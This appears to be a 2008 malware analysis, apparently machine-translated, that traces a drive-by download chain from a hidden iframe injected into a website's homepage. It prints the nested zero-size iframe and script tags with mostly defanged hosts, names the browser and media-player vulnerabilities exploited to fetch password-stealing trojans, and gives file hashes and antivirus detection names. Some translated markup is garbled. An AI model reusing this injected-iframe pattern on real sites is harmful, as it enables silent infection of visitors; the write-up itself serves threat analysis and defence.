Trojan rootkit. win32.mnless, Trojan. win32.edog, etc.
EndurerOriginal
2008-02-021Version
Ie lost response after opening the website ......
Code found at the bottom of the homepage:
/---
<IFRAME src = "hxxp: // 8 ** 8.8*812 ** 15.com/88.htm" width = 0 Height = 0> </iframe>
---/
1 hxxp: // 8 ** 8.8*812 ** 15.com/88.htm
Code included:
/---
<IFRAME src = "hxxp: // 8 *** 8.8*812 *** 15.com/in.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ga **. Mm * 52 ** 08.com/20.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // D ** V.5 ** 51 * 89.net/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // A * 1 **. SB ** B2 * 2.com/a.htm" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // s * f *. 07 ** 08 * 08.net/sf.htm" width = 0 Height = 0> </iframe>
---/
1.1 hxxp: // 8 ** 8.8*812 ** 15.com/in.htm
Code included:
/---
<IFRAME src = "hxxp: // y ** UN. y ** un8 ** 78.com/web/6620.38.htm" width = 100 Height = 0> </iframe>
---/
1.1.1 hxxp: // y ** UN. y ** un8 ** 78.com/web/6620.38.htm
Code included:
/---
<IFRAME srcw.htm.html width = 100 Height = 0> </iframe>
---/
1.1.1.1 hxxp: // y ** UN. y ** un8 ** 78.com/web/htm.htmloutput code:
/---
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/1.js> </SCRIPT>
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/bf.js> </SCRIPT>
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/pps.js> </SCRIPT>
<IFRAME width = '10' Height = '10' src = 'hxxp: // y ** UN. y ** un8 ** 78.com/web/3.htm'> </iframe>
<SCRIPT src = hxxp: // y ** UN. y ** un8 ** 78.com/web/pps.js> </SCRIPT>
<IFRAME width = '000000' Height = '0' src = 'hxxp: // y ** UN. y ** un8 ** 78.com/web/2.htm'> </iframe>
<IFRAME width = 100 Height = 0 src = hxxp: // y ** UN. y ** un8 ** 78.com/web/0.htm> </iframe>
---/
1.1.1.1.1 hxxp: // y ** UN. y ** un8 ** 78.com/web/1.js
Download hxxp: // y ** UN. y ** un8 ** 78.com/14.exe with a severe vulnerability in MS06-014: msadco. dll
File Description: D:/test/14.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 17:15:21
Size: 9728 bytes, 9.512 KB
MD5: b64fac1da0efbbc479486fefa269cf39
Sha1: 35e62825704027baa6dc0d7089857d10986fbd71
CRC32: 8e086454
Kaspersky: Trojan-PSW.Win32.OnLineGames.pik, rising Report: Trojan. DL. win32.undef. W
1.1.1.1.2 hxxp: // y ** UN. y ** un8 ** 78.com/web/bf.js
Download hxxp: // y ** UN. y ** un8 ** 78.com/bf.exe with the storm video Vulnerability
File Description: D:/test/bf.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:15:57
Modification time: 17:15:57
Access time: 17:16:24
Size: 23886 bytes, 23.334 KB
MD5: a20a230c7e2e1f93bc659aa9fa1ed3d1
Sha1: 8fe260c3a6a971d339b2ea170283c13f4faade87
CRC32: 13eb41fd
Kaspersky: Trojan-PSW.Win32.OnLineGames.ode, rising Report: Trojan. DL. win32.undef. W, rootkit. win32.mnless. GP
1.1.1.1.3 hxxp: // y ** UN. y ** un8 ** 78.com/web/pps.js
Use the PPStream vulnerability to download hxxp: // y ** UN. y ** un8 ** 78.com/pps.exe
Pps.exe is the same as bf.exe.
1.1.1.1.4 use baidubar. tool to download hxxp: // y ** UN. y ** un8 ** 78.com/ad.cab
Ad.cabpackage containing bd.exe
Bd.exe is the same as bf.exe.
1.1.1.1.5 hxxp: // y ** UN. y ** un8 ** 78.com/web/3.htm
Download hxxp: // y ** UN. y ** un8 ** 78.com/g.exe using the glchat. ocx Vulnerability in the Internet world
G.exe is the same as bf.exe.
1.1.1.1.6 hxxp: // y ** UN. y ** un8 ** 78.com/web/2.htm
RealPlayer vulnerability exploitation code. One of the codes is: payload + = "yuange ";
1.1.1.1.7 hxxp: // y ** UN. y ** un8 ** 78.com/web/0.htm
Use the qvod player vulnerability to download hxxp: // y ** UN. y ** un8 ** 78.com/me.exe
Me.exe is the same as bf.exe.
1.2 hxxp: // ga **. Mm * 52 ** 08.com/20.htm
Code included:
/---
<IFRAME src = "hxxp: // 3 ** 75 * 86.com/uu/web.htm" width = 100 Height = 0> </iframe>
---/
1.2.1 hxxp: // 3 *** 75 * 86.com/uu/web.htm
Code included:
/---
<IFRAME srcw.r.htm width = 10 Height = 0> </iframe>
<IFRAME src?index.htm width = 10 Height = 0> </iframe>
---/
1.2.1.1 hxxp: // 3 ** 75 * 86.com/uu/r.htm
RealPlayer vulnerability exploitation code. One of the codes is: xcbfcxn + = "Lizhen ";
1.2.1.2 hxxp: // 3 ** 75 * 86.com/uu/index.htm
Output code:
/---
<IFRAME src000006014.html> </iframe>
<SCRIPT src#bf.gif> </SCRIPT>
<SCRIPT src?pps.gif> </SCRIPT>
<SCRIPT srcw.lz.gif> </SCRIPT>
---/
1.2.1.2.1 hxxp: // 3 *** 75 * 86.com/uu/06014.html
Download hxxp: // 3 ** 75 * 86.com/uu/uuu.exe with a severe vulnerability in MS06-014: msadco. dll and save it as quit.exe
File Description: D:/test/uuu.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:27:20
Modification time: 17:27:20
Access time: 17:27:30
Size: 19476 bytes, 19.20 KB
MD5: 9eaf1e6e1986170ffdcfae05852f5d0e
Sha1: 4b55206aab215f1e09e9442988da5b7c61716fa9
CRC32: 3177b317
1.2.1.2.2 hxxp: // 3 ** 75 * 86.com/uu/bf.gif
Download hxxp: // 3 ** 75 * 86.com/uu/uuu.exe using the storm audio and video Vulnerability
1.2.1.2.3 hxxp: // 3 ** 75 * 86.com/uu/lz.gif
Download hxxp: // 3 ** 75 * 86.com/uu/uuu.exe using the glchat. ocx Vulnerability in the Internet world
1.2.1.2.4 hxxp: // 3 *** 75 * 86.com/uu/pps.gif
Use the PPStream vulnerability to download hxxp: // 3 ** 75 * 86.com/uuu/uuu.exe
1.3 hxxp: // D ** V.5 ** 51 * 89.net/
Code included:
/---
<IFRAME src = "hxxp: // PPP. Bu * ya ** oni **. com/ww/new82.htm" width = 1 Height = 1> </iframe>
---/
1.3.1 hxxp: // PPP. Bu * ya ** oni **. com/ww/new82.htm
Code included:
/---
<IFRAME src = hxxp: // PPP. Bu * ya ** oni **. com/dm/diao.htm width = 1 Height = 1> </iframe>
<IFRAME src = hxxp: // PPP. Bu * ya ** oni **. com/dm/rl.htm width = 1 Height = 1> </iframe>
<IFRAME src = hxxp: // PPP. Bu * ya ** oni **. com/dm/rr.htm width = 1 Height = 1> </iframe>
---/
1.3.1.1 hxxp: // PPP. Bu * ya ** oni **. com/dm/diao.htm
Output code:
/---
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/11.js> </SCRIPT>
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/BB. js> </SCRIPT>
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/pp. js> </SCRIPT>
<SCRIPT src = hxxp: // PPP. Bu * ya ** oni **. com/dm/pp. js> </SCRIPT>
---/
1.3.1.1.1 hxxp: // PPP. Bu * ya ** oni **. com/dm/11.js
Download hxxp: // dd.749571.com/bb/014.exewith a severe vulnerability in MS06-014: msadco. dll, save as ntuser.com
File Description: D:/test/014.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 12272 bytes, 11.1008 KB
MD5: f12f5cb120648999c40ef8a617efd8da
Sha1: 881d4cf70f5a9a77df37438c826e00fc3fc619d6
CRC32: f6a07465
Kaspersky: Trojan-Downloader.Win32.Agent.ine, rising: Trojan. DL. win32.mnless. XR
1.3.1.1.2 hxxp: // PPP. Bu * ya ** oni **. com/dm/BB. js
Download hxxp: // dd.749571.com/bb/bb.exe
Bb.exe is the same as 014.exe.
1.3.1.1.3 hxxp: // PPP. Bu * ya ** oni **. com/dm/pp. js
Use the PPStream vulnerability to download hxxp: // dd.749571.com/bb/pp.exe
Pp.exe is the same as 014.exe.
1.3.1.1.4 use baidubar. tool to download hxxp: // dd.749571.com/bb/bd.cab
Include File: bd.exe
Bd.exe is the same as 014.exe.
1.3.1.2 hxxp: // PPP. Bu * ya ** oni **. com/dm/rl.htm
RealPlayer vulnerability exploitation code. One of the codes is: xcbfcxn + = "Lizhen ";
1.3.1.3 hxxp: // PPP. Bu * ya ** oni **. com/dm/rr.htm
Download hxxp: // is.749571.com/bb/a.exe using the glchat. ocx Vulnerability in the Internet world.
A.exe cannot be downloaded.
1.4 hxxp: // A * 1 **. SB ** B2 * 2.com/a.htm
Code included:
/---
<IFRAME src = "hxxp: // XXX. j ** SP ** p * P. US/dgll1.htm? Id = TT "width = 100 Height = 0> </iframe>
---/
1.4.1 hxxp: // XXX. j ** SP ** p * P. US/dgll1.htm? Id = TT
Output code:
/---
<IFRAME width = 100 Height = 1 frameborder = 0 scrolling = No src = "Ceshi/real.htm"> </iframe>
<IFRAME width = 100 Height = 1 frameborder = 0 scrolling = No src = "Ceshi/lz.htm"> </iframe>
<IFRAME width = 100 Height = 1 frameborder = 0 scrolling = No src = "Ceshi/614.htm"> </iframe>
---/
1.4.1.1 hxxp: // XXX. j ** SP ** p * P. US/Ceshi/real.htm
RealPlayer vulnerability exploitation code. One of the codes is: xcbfcxn + = "Lizhen ";
1.4.1.2 hxxp: // XXX. j ** SP ** p * P. US/Ceshi/lz.htm
Download hxxp: // XXX. j ** SP ** p * P. US/ww/dod.exe using US-ASCII code and the world glchat. ocx Vulnerability
File Description: D:/test/dod.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:39:25
Modification time: 17:39:25
Access time: 17:39:38
Size: 12248 bytes, 11.984 KB
MD5: d7da77be93072171fa1e6778655e37da
Sha1: 74ea3b71ab6953a231e914b3592ded61de4c198b
CRC32: ca260cda
Kaspersky: Trojan-Downloader.Win32.Agent.iga, rising: Trojan. DL. win32.mnless. XR
1.4.1.3 hxxp: // XXX. j ** SP ** p * P. US/Ceshi/614.htm
Download hxxp: // XXX. j ** SP ** P. US/ww/dod.exe with MS06-014: msadco. dll severe vulnerability
1.5 hxxp: // s * f *. 07 ** 08 * 08.net/sf.htm
Code included:
/---
<IFRAME src = "hxxp: // XXX. A ** OMI * Ba **. com/index888.htm? F8? 001 "width = 0 Height = 0> </iframe>
---/
1.5.1 hxxp: // XXX. A ** OMI * Ba **. com/index888.htm? F8? 001
Output the following code:
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/ajax.gif> </SCRIPT>
<IFRAME width = '0' Height = '0' src = 'hxxp: // XXX. A ** OMI * Ba **. com/ms06014.htm'> </iframe>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/real. js> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/bfyy.gif> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/pps.gif> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/xunlei.gif> </SCRIPT>
<SCRIPT src = hxxp: // XXX. A ** OMI * Ba **. com/lz.gif> </SCRIPT>
<IFRAME width = '0' Height = '0' src = 'hxxp: // XXX. A ** OMI * Ba **. com/qvod.html '> </iframe>
---/
1.5.1.1 hxxp: // XXX. A ** OMI * Ba **. com/ajax.gif
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe with MS06-014: msadco. dll critical vulnerability
File Description: D:/test/xxx.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 17:43:58
Modification time: 17:43:59
Access time:
Size: 12288 bytes, 12.0 KB
MD5: ebea634c297a18c2ff5dbc72841e178a
Sha1: cc2a9a901dc5b2f3e513e2370d008defb00f094a
CRC32: 252b48da
Kaspersky: Trojan-PSW.Win32.OnLineGames.qgh, rising: Trojan. win32.edog. j
1.5.1.2 hxxp: // XXX. A ** OMI * Ba **. com/ms06014.htm
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe with MS06-014: msadco. dll critical vulnerability
1.5.1.3 hxxp: // XXX. A ** OMI * Ba **. com/real. js
Use the RealPlayer vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe
1.5.1.4 hxxp: // XXX. A ** OMI * Ba **. com/bfyy.gif
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe
1.5.1.5 hxxp: // XXX. A ** OMI * Ba **. com/pps.gif
Use the PPStream vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe
1.5.1.6 hxxp: // XXX. A ** OMI * Ba **. com/xunlei.gif
Use the thunder vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe
1.5.1.7 hxxp: // XXX. A ** OMI * Ba **. com/lz.gif
Download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe using the glchat. ocx Vulnerability in the Internet world.
1.5.1.8 hxxp: // XXX. A ** OMI * Ba **. com/qvod.html
Use the qvod player vulnerability to download hxxp: // XXX. A ** OMI * Ba **. com/xxx.exe